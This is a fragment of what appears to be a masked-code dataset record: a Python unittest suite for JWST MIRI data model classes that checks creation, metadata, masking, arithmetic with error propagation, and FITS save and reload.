MiriMeasuredModel(data=a2)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.err)\n self.assertEqual(newdp1.err.shape, newdp1.data.shape)\n self.assertAlmostEqual(np.mean(newdp1.err), 0.0)\n self.assertIsNotNone(newdp1.dq)\n self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)\n self.assertEqual(np.mean(newdp1.dq), 0)\n descr1 = str(newdp1)\n self.assertIsNotNone(descr1)\n del newdp1, descr1\n newdp2 = MiriMeasuredModel(data=a2, err=b2)\n self.assertIsNotNone(newdp2.data)\n self.assertGreater(len(newdp2.data), 0)\n self.assertIsNotNone(newdp2.err)\n self.assertEqual(newdp2.err.shape, newdp2.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)\n self.assertIsNotNone(newdp2.dq)\n self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)\n self.assertEqual(np.mean(newdp2.dq), 0)\n descr2 = str(newdp2)\n self.assertIsNotNone(descr2)\n del newdp2, descr2\n newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.err)\n self.assertEqual(newdp3.err.shape, newdp3.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)\n self.assertIsNotNone(newdp3.dq)\n self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)\n self.assertNotEqual(np.mean(newdp3.dq), 0)\n descr3 = str(newdp3)\n self.assertIsNotNone(descr3)\n del newdp3, descr3\n emptydp = MiriMeasuredModel((4, 4))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (4, 4))\n self.assertIsNotNone(emptydp.err)\n self.assertEqual(emptydp.err.shape, (4, 4))\n self.assertIsNotNone(emptydp.dq)\n self.assertEqual(emptydp.dq.shape, (4, 4))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriMeasuredModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(a2)\n self.assertIsNotNone(nulldp.err)\n self.assertIsNotNone(nulldp.dq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n scalardp = MiriMeasuredModel(data=42)\n self.assertEqual(scalardp.data, 42)\n self.assertIsNotNone(scalardp.err)\n self.assertIsNotNone(scalardp.dq)\n descr = str(scalardp)\n self.assertIsNotNone(descr)\n del scalardp, descr\n self.assertRaises(ValueError, MiriMeasuredModel, init=[])\n self.assertRaises(ValueError, MiriMeasuredModel, init=42)\n self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name'\n )\n self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')\n self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')\n\n def test_metadata(self):\n kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n telname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.meta.telescope\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.get_fits_keyword('TELESCOP')\n self.assertEqual(telname, 'JWST')\n kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n insname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.meta.instrument.name\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.get_fits_keyword('INSTRUME')\n self.assertEqual(insname, 'MIRI')\n self.simpleproduct.add_history('History 1')\n self.simpleproduct.add_history('History 2')\n self.simpleproduct.add_history('History 3')\n self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)\n strg = self.simpleproduct.get_history_str()\n self.assertIsNotNone(strg)\n self.assertGreater(len(strg), 0)\n\n def test_content(self):\n self.assertTrue(np.allclose(self.primary, self.dataproduct.data))\n self.assertTrue(np.allclose(self.error, self.dataproduct.err))\n self.assertTrue(np.allclose(self.quality, self.dataproduct.dq))\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.simpleproduct.save(self.testfile1, overwrite=True)\n with MiriMeasuredModel(self.testfile1) as readback:\n self.assertTrue(np.allclose(self.simpleproduct.data,\n readback.data))\n del readback\n self.dataproduct.save(self.testfile2, overwrite=True)\n with MiriMeasuredModel(self.testfile2) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq'], tables='dq_def')\n del readback\n\n def test_asciiio(self):\n pass\n\n def test_masking(self):\n a2 = [[10, 999, 10, 999], [999, 10, 10, 999], [10, 10, 999, 10]]\n b2 = [[1, 99, 1, 99], [99, 1, 1, 99], [1, 1, 99, 1]]\n c2 = [[0, 1, 0, 1], [1, 0, 0, 1], [0, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2)\n meandata = np.mean(newdp.data_masked)\n self.assertGreater(meandata, 10)\n meanerr = np.mean(newdp.err_masked)\n self.assertGreater(meanerr, 1)\n newdp2 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n meandata2 = np.mean(newdp2.data_masked)\n self.assertAlmostEqual(meandata2, 10)\n meanerr2 = np.mean(newdp2.err_masked)\n self.assertAlmostEqual(meanerr2, 1)\n del newdp, newdp2\n\n def test_arithmetic(self):\n a2 = [[90, 80, 70, 60], [50, 40, 30, 20], [10, 0, -10, -20]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[0, 1, 1, 0], [0, 2, 0, 2], [1, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n newsimple = self.simpleproduct - self.simpleproduct\n self.assertAlmostEqual(newsimple.data.all(), 0.0)\n del newsimple\n result = self.dataproduct + 42\n test1 = self.dataproduct.data + 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct + newdp\n test1 = self.dataproduct.data + newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct - 42\n test1 = self.dataproduct.data - 42\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct - newdp\n test1 = self.dataproduct.data - newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n expectedsq = self.error[1][0] * self.error[1][0] + b2[1][0] * b2[1][0]\n actualsq = result.err[1, 0] * result.err[1, 0]\n self.assertAlmostEqual(expectedsq, actualsq)\n expectedsq = self.error[2][1] * self.error[2][1] + b2[2][1] * b2[2][1]\n actualsq = result.err[2, 1] * result.err[2, 1]\n self.assertAlmostEqual(expectedsq, actualsq)\n del result\n result = self.dataproduct + newdp - newdp\n test1 = self.dataproduct.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * 3\n test1 = self.dataproduct.data * 3\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n del result\n result = self.dataproduct * newdp\n test1 = self.dataproduct.data * newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n err1 = self.dataproduct.err\n da1 = self.dataproduct.data\n err2 = newdp.err\n da2 = newdp.data\n expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1\n )\n self.assertTrue(np.array_equal(expectedErr, result.err))\n del result, da1, da2, err1, err2, expectedErr\n result = self.dataproduct / 3.0\n test1 = self.dataproduct.data / 3.0\n test2 = result.data\n self.assertAlmostEqual(test1.all(), test2.all())\n del test1, test2, result\n self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n result = self.dataproduct / newdp\n test1 = self.dataproduct.data / newdp.data\n test2 = result.data\n self.assertEqual(test1.all(), test2.all())\n dat = self.dataproduct.data[1][1]\n newdat = newdp.data[1][1]\n resultErr = result.err[1][1]\n dpErr = self.dataproduct.err[1][1]\n newdpErr = newdp.err[1][1]\n expectErr = np.sqrt(dpErr * dpErr / (newdat * newdat) + \n newdpErr * newdpErr * dat * dat / (newdat * newdat * newdat *\n newdat))\n self.assertEqual(expectErr, resultErr)\n del test1, test2, result\n newdp2 = newdp * 2\n newdp3 = newdp * 3\n newdp4 = newdp2 + newdp3\n result = (self.dataproduct - newdp) * newdp2 / newdp3 + newdp4\n del newdp, newdp2, newdp3, newdp4\n del result\n <mask token>\n\n def test_description(self):\n descr = str(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.simpleproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.simpleproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.err)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriRampModel(unittest.TestCase):\n\n def setUp(self):\n self.a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n self.c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.c2 = [[0, 1, 1, 0], [1, 0, 0, 1], [1, 0, 1, 0]]\n self.acube = [self.a1, self.a1, self.a1]\n self.ccube = [self.c1, self.c2, self.c1]\n self.ahyper = [self.acube, self.acube]\n self.chyper = [self.ccube, self.ccube]\n self.refout = np.ones_like(self.chyper)\n self.dataproduct = MiriRampModel(data=self.ahyper, refout=self.\n refout, pixeldq=self.c1, dq_def=pixeldq_flags, groupdq=self.\n chyper, groupdq_def=groupdq_flags)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIFULONG',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriRampModel_test.fits'\n\n def tearDown(self):\n del self.a1, self.c1, self.c2\n del self.acube, self.ccube\n del self.ahyper, self.chyper\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n bcube = [b1, b1, b1]\n bhyper = [bcube, bcube]\n newdp1 = MiriRampModel(data=self.ahyper)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.pixeldq)\n self.assertTrue(newdp1.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp1.groupdq)\n self.assertTrue(newdp1.groupdq.ndim == 4)\n self.assertEqual(np.mean(newdp1.groupdq), 0)\n descr1 = str(newdp1)\n del newdp1, descr1\n newdp3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.pixeldq)\n self.assertTrue(newdp3.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp3.pixeldq), 0)\n self.assertIsNotNone(newdp3.groupdq)\n self.assertTrue(newdp3.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp3.groupdq), 0)\n descr3 = str(newdp3)\n del newdp3, descr3\n newdp4 = MiriRampModel(data=self.ahyper, pixeldq=self.c1)\n self.assertIsNotNone(newdp4.data)\n self.assertGreater(len(newdp4.data), 0)\n self.assertIsNotNone(newdp4.pixeldq)\n self.assertTrue(newdp4.pixeldq.ndim == 2)\n self.assertNotEqual(np.mean(newdp4.pixeldq), 0)\n self.assertIsNotNone(newdp4.groupdq)\n self.assertTrue(newdp4.groupdq.ndim == 4)\n descr4 = str(newdp4)\n del newdp4, descr4\n newdp5 = MiriRampModel(data=self.ahyper, groupdq=self.chyper)\n self.assertIsNotNone(newdp5.data)\n self.assertGreater(len(newdp5.data), 0)\n self.assertIsNotNone(newdp5.pixeldq)\n self.assertTrue(newdp5.pixeldq.ndim == 2)\n self.assertIsNotNone(newdp5.groupdq)\n self.assertTrue(newdp5.groupdq.ndim == 4)\n self.assertNotEqual(np.mean(newdp5.groupdq), 0)\n descr5 = str(newdp5)\n del newdp5, descr5\n emptydp = MiriRampModel((2, 2, 2, 2))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (2, 2, 2, 2))\n self.assertIsNotNone(emptydp.pixeldq)\n self.assertIsNotNone(emptydp.groupdq)\n self.assertEqual(emptydp.groupdq.shape, (2, 2, 2, 2))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriRampModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(self.ahyper)\n self.assertIsNotNone(nulldp.pixeldq)\n self.assertIsNotNone(nulldp.groupdq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n a1d = [10, 20, 30, 40]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriRampModel, data=a1d, pixeldq=c1d)\n a2d = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n c2d = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.assertRaises(ValueError, MiriRampModel, data=a2d, groupdq=c2d)\n a3d = [a2d, a2d, a2d]\n c3d = [c2d, c2d, c2d]\n self.assertRaises(ValueError, MiriRampModel, data=a3d, pixeldq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=a3d, groupdq=c3d)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n pixeldq=self.ccube)\n self.assertRaises(ValueError, MiriRampModel, data=self.ahyper,\n groupdq=self.c1)\n\n def test_masking(self):\n self.assertIsNotNone(self.dataproduct.dq)\n mask1 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='pixeldq')\n self.assertIsNotNone(mask1.pixeldq)\n self.assertGreater(len(mask1.pixeldq), 0)\n self.assertIsNotNone(mask1.dq)\n self.assertGreater(len(mask1.dq), 0)\n self.assertEqual(mask1.dq.shape, mask1.pixeldq.shape)\n self.assertTrue(np.all(mask1.dq == mask1.pixeldq))\n del mask1\n mask2 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='groupdq')\n self.assertIsNotNone(mask2.groupdq)\n self.assertGreater(len(mask2.groupdq), 0)\n self.assertIsNotNone(mask2.dq)\n self.assertGreater(len(mask2.dq), 0)\n self.assertEqual(mask2.dq.shape, mask2.groupdq.shape)\n self.assertTrue(np.all(mask2.dq == mask2.groupdq))\n del mask2\n mask3 = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n self.assertIsNotNone(mask3.pixeldq)\n self.assertGreater(len(mask3.pixeldq), 0)\n self.assertIsNotNone(mask3.groupdq)\n self.assertGreater(len(mask3.groupdq), 0)\n self.assertIsNotNone(mask3.dq)\n self.assertGreater(len(mask3.dq), 0)\n self.assertEqual(mask3.dq.shape, mask3.groupdq.shape)\n expected = mask3.groupdq | mask3.pixeldq\n self.assertTrue(np.all(mask3.dq == expected))\n del mask3\n\n def test_arithmetic(self):\n testdp = MiriRampModel(data=self.ahyper, pixeldq=self.c1, groupdq=\n self.chyper, maskwith='both')\n descr = str(testdp)\n self.assertIsNotNone(descr)\n del descr\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n double = testdp * 2.0\n self.assertIsNotNone(double.data)\n self.assertGreater(len(double.data), 0)\n expected = double.data * 2.0\n self.assertTrue(np.all(double.data - expected < 0.001))\n descr = str(double)\n self.assertIsNotNone(descr)\n del descr\n warnings.simplefilter('ignore')\n result = self.dataproduct + testdp\n self.assertIsNotNone(result.data)\n self.assertGreater(len(result.data), 0)\n self.assertIsNotNone(result.dq)\n self.assertGreater(len(result.dq), 0)\n descr = str(result)\n self.assertIsNotNone(descr)\n del descr\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriRampModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'refout', 'pixeldq', 'groupdq'], tables\n =['pixeldq_def', 'groupdq_def'])\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.refout)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\nclass TestMiriSlopeModel(unittest.TestCase):\n\n def setUp(self):\n a1 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b1 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c1 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n acube = [a1, a1, a1]\n bcube = [b1, b1, b1]\n ccube = [c1, c1, c1]\n dcube = [a1, b1, a1]\n self.dataproduct = MiriSlopeModel(data=acube, err=bcube, dq=ccube,\n dq_def=master_flags, zeropt=dcube, fiterr=dcube)\n self.dataproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',\n 'V1.0')\n self.dataproduct.set_observation_metadata()\n self.dataproduct.set_target_metadata(0.0, 0.0)\n self.dataproduct.set_instrument_metadata(detector='MIRIMAGE', filt=\n 'F2550W', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='SLOW', nints=3,\n ngroups=10, frame_time=1.0, integration_time=100.0, group_time=\n 1000.0, reset_time=0, frame_resets=3)\n self.testfile = 'MiriSlopeModel_test.fits'\n\n def tearDown(self):\n del self.dataproduct\n if os.path.isfile(self.testfile):\n try:\n os.remove(self.testfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + self.testfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n\n def test_creation(self):\n a1d = [10, 20, 30, 40]\n b1d = [1, 2, 3, 4]\n c1d = [1, 0, 0, 0]\n self.assertRaises(ValueError, MiriSlopeModel, data=a1d, err=b1d, dq=c1d\n )\n a2d = [a1d, a1d, a1d]\n b2d = [b1d, b1d, b1d]\n c2d = [c1d, c1d, c1d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a2d, err=b2d, dq=c2d\n )\n a3d = [a2d, a2d]\n b3d = [b2d, b2d]\n c3d = [c2d, c2d]\n a4d = [a3d, a3d]\n b4d = [b3d, b3d]\n c4d = [c3d, c3d]\n self.assertRaises(ValueError, MiriSlopeModel, data=a4d, err=b4d, dq=c4d\n )\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq', 'nreads', 'readsat', 'ngoodseg', 'zeropt',\n 'fiterr'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.dataproduct.save(self.testfile, overwrite=True)\n with MiriSlopeModel(self.testfile) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq', 'nreads', 'readsat',\n 'ngoodseg', 'zeropt', 'fiterr'], tables='dq_def')\n del readback\n\n def test_description(self):\n descr = str(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = repr(self.dataproduct)\n self.assertIsNotNone(descr)\n del descr\n descr = self.dataproduct.stats()\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.data)\n self.assertIsNotNone(descr)\n del descr\n descr = str(self.dataproduct.dq)\n self.assertIsNotNone(descr)\n del descr\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass TestMiriMeasuredModel(unittest.TestCase):\n\n def setUp(self):\n self.data = np.linspace(0.0, 100000.0, 64 * 64)\n self.data.shape = [64, 64]\n self.simpleproduct = MiriMeasuredModel(data=self.data)\n self.simpleproduct.set_housekeeping_metadata('MIRI EC',\n 'Joe Bloggs', 'V1.0')\n self.simpleproduct.set_instrument_metadata(detector='MIRIMAGE',\n filt='F560W', ccc_pos='OPEN', deck_temperature=10.0,\n detector_temperature=7.0)\n self.simpleproduct.set_exposure_metadata(readpatt='SLOW', nints=1,\n ngroups=10, frame_time=30.0, integration_time=30.0, group_time=\n 300.0, reset_time=0, frame_resets=3)\n self.primary = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]\n ]\n self.error = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n self.quality = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n self.dataproduct = MiriMeasuredModel(data=self.primary, err=self.\n error, dq=self.quality, dq_def=master_flags)\n self.dataproduct.set_instrument_metadata(detector='MIRIFUSHORT',\n channel='1', ccc_pos='OPEN', deck_temperature=11.0,\n detector_temperature=6.0)\n self.dataproduct.set_exposure_metadata(readpatt='FAST', nints=1,\n ngroups=1, frame_time=1.0, integration_time=10.0, group_time=\n 10.0, reset_time=0, frame_resets=3)\n self.testfile1 = 'MiriMeasuredModel_test1.fits'\n self.testfile2 = 'MiriMeasuredModel_test2.fits'\n self.tempfiles = [self.testfile1, self.testfile2]\n\n def tearDown(self):\n del self.dataproduct\n del self.primary, self.error, self.quality\n del self.simpleproduct\n del self.data\n for tempfile in self.tempfiles:\n if os.path.isfile(tempfile):\n try:\n os.remove(tempfile)\n except Exception as e:\n strg = ('Could not remove temporary file, ' + tempfile +\n '\\n ' + str(e))\n warnings.warn(strg)\n del self.tempfiles\n\n def test_creation(self):\n dq_def_names = list(MiriMeasuredModel.dq_def_names)\n schema_names = list(self.dataproduct.get_field_names('dq_def'))\n self.assertEqual(dq_def_names, schema_names,\n \"'dq_def_names' class variable does not match schema\")\n a2 = [[10, 20, 30, 40], [50, 60, 70, 80], [90, 100, 110, 120]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[1, 0, 0, 0], [0, 1, 0, 1], [1, 0, 1, 0]]\n newdp1 = MiriMeasuredModel(data=a2)\n self.assertIsNotNone(newdp1.data)\n self.assertGreater(len(newdp1.data), 0)\n self.assertIsNotNone(newdp1.err)\n self.assertEqual(newdp1.err.shape, newdp1.data.shape)\n self.assertAlmostEqual(np.mean(newdp1.err), 0.0)\n self.assertIsNotNone(newdp1.dq)\n self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)\n self.assertEqual(np.mean(newdp1.dq), 0)\n descr1 = str(newdp1)\n self.assertIsNotNone(descr1)\n del newdp1, descr1\n newdp2 = MiriMeasuredModel(data=a2, err=b2)\n self.assertIsNotNone(newdp2.data)\n self.assertGreater(len(newdp2.data), 0)\n self.assertIsNotNone(newdp2.err)\n self.assertEqual(newdp2.err.shape, newdp2.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)\n self.assertIsNotNone(newdp2.dq)\n self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)\n self.assertEqual(np.mean(newdp2.dq), 0)\n descr2 = str(newdp2)\n self.assertIsNotNone(descr2)\n del newdp2, descr2\n newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n self.assertIsNotNone(newdp3.data)\n self.assertGreater(len(newdp3.data), 0)\n self.assertIsNotNone(newdp3.err)\n self.assertEqual(newdp3.err.shape, newdp3.data.shape)\n self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)\n self.assertIsNotNone(newdp3.dq)\n self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)\n self.assertNotEqual(np.mean(newdp3.dq), 0)\n descr3 = str(newdp3)\n self.assertIsNotNone(descr3)\n del newdp3, descr3\n emptydp = MiriMeasuredModel((4, 4))\n self.assertIsNotNone(emptydp.data)\n self.assertEqual(emptydp.data.shape, (4, 4))\n self.assertIsNotNone(emptydp.err)\n self.assertEqual(emptydp.err.shape, (4, 4))\n self.assertIsNotNone(emptydp.dq)\n self.assertEqual(emptydp.dq.shape, (4, 4))\n descr = str(emptydp)\n self.assertIsNotNone(descr)\n del emptydp, descr\n nulldp = MiriMeasuredModel()\n descr1 = str(nulldp)\n self.assertIsNotNone(descr1)\n nulldp.data = np.asarray(a2)\n self.assertIsNotNone(nulldp.err)\n self.assertIsNotNone(nulldp.dq)\n descr2 = str(nulldp)\n self.assertIsNotNone(descr2)\n del nulldp, descr1, descr2\n scalardp = MiriMeasuredModel(data=42)\n self.assertEqual(scalardp.data, 42)\n self.assertIsNotNone(scalardp.err)\n self.assertIsNotNone(scalardp.dq)\n descr = str(scalardp)\n self.assertIsNotNone(descr)\n del scalardp, descr\n self.assertRaises(ValueError, MiriMeasuredModel, init=[])\n self.assertRaises(ValueError, MiriMeasuredModel, init=42)\n self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name'\n )\n self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')\n self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')\n\n def test_metadata(self):\n kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n telname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.meta.telescope\n self.assertEqual(telname, 'JWST')\n telname = self.simpleproduct.get_fits_keyword('TELESCOP')\n self.assertEqual(telname, 'JWST')\n kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',\n return_result=True)\n self.assertIsNotNone(kwstrg)\n insname = self.simpleproduct[kwstrg[0]]\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.meta.instrument.name\n self.assertEqual(insname, 'MIRI')\n insname = self.simpleproduct.get_fits_keyword('INSTRUME')\n self.assertEqual(insname, 'MIRI')\n self.simpleproduct.add_history('History 1')\n self.simpleproduct.add_history('History 2')\n self.simpleproduct.add_history('History 3')\n self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)\n strg = self.simpleproduct.get_history_str()\n self.assertIsNotNone(strg)\n self.assertGreater(len(strg), 0)\n\n def test_content(self):\n self.assertTrue(np.allclose(self.primary, self.dataproduct.data))\n self.assertTrue(np.allclose(self.error, self.dataproduct.err))\n self.assertTrue(np.allclose(self.quality, self.dataproduct.dq))\n\n def test_copy(self):\n datacopy = self.dataproduct.copy()\n self.assertIsNotNone(datacopy)\n assert_products_equal(self, self.dataproduct, datacopy, arrays=[\n 'data', 'err', 'dq'], tables='dq_def')\n del datacopy\n\n def test_fitsio(self):\n with warnings.catch_warnings():\n warnings.simplefilter('ignore')\n self.simpleproduct.save(self.testfile1, overwrite=True)\n with MiriMeasuredModel(self.testfile1) as readback:\n self.assertTrue(np.allclose(self.simpleproduct.data,\n readback.data))\n del readback\n self.dataproduct.save(self.testfile2, overwrite=True)\n with MiriMeasuredModel(self.testfile2) as readback:\n assert_products_equal(self, self.dataproduct, readback,\n arrays=['data', 'err', 'dq'], tables='dq_def')\n del readback\n\n def test_asciiio(self):\n pass\n\n def test_masking(self):\n a2 = [[10, 999, 10, 999], [999, 10, 10, 999], [10, 10, 999, 10]]\n b2 = [[1, 99, 1, 99], [99, 1, 1, 99], [1, 1, 99, 1]]\n c2 = [[0, 1, 0, 1], [1, 0, 0, 1], [0, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2)\n meandata = np.mean(newdp.data_masked)\n self.assertGreater(meandata, 10)\n meanerr = np.mean(newdp.err_masked)\n self.assertGreater(meanerr, 1)\n newdp2 = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n meandata2 = np.mean(newdp2.data_masked)\n self.assertAlmostEqual(meandata2, 10)\n meanerr2 = np.mean(newdp2.err_masked)\n self.assertAlmostEqual(meanerr2, 1)\n del newdp, newdp2\n\n def test_arithmetic(self):\n a2 = [[90, 80, 70, 60], [50, 40, 30, 20], [10, 0, -10, -20]]\n b2 = [[1, 2, 3, 4], [5, 6, 7, 8], [9, 10, 11, 12]]\n c2 = [[0, 1, 1, 0], [0, 2, 0, 2], [1, 0, 1, 0]]\n newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)\n newsimple = self.simpleproduct - self.simpleproduct\n 